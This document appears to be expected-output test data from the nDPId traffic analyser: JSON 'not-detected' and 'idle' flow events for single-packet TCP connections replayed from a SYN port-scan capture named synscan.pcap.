+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4444,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1056,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4443,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1056,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1655,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060948,"flow_last_seen":1278275060948,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20828,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1655,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060948,"flow_last_seen":1278275060948,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20828,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4444,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4444,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1015,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4445,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1015,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4446,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4446,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1090,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4445,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1090,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4446,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4446,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1038,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2399,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1038,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2399,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2399,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2399,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1937,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2401,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1937,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2401,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":617,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4449,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":617,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4449,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1985,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2401,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1985,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2401,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":680,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4449,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":680,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4449,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6502,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1809,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6502,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1809,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":742,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6510,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":742,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6510,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":726,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":366,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":726,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":366,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":813,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6510,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":813,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6510,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":779,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":366,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":779,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":366,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":987,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10616,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":987,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1060,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10616,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1060,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 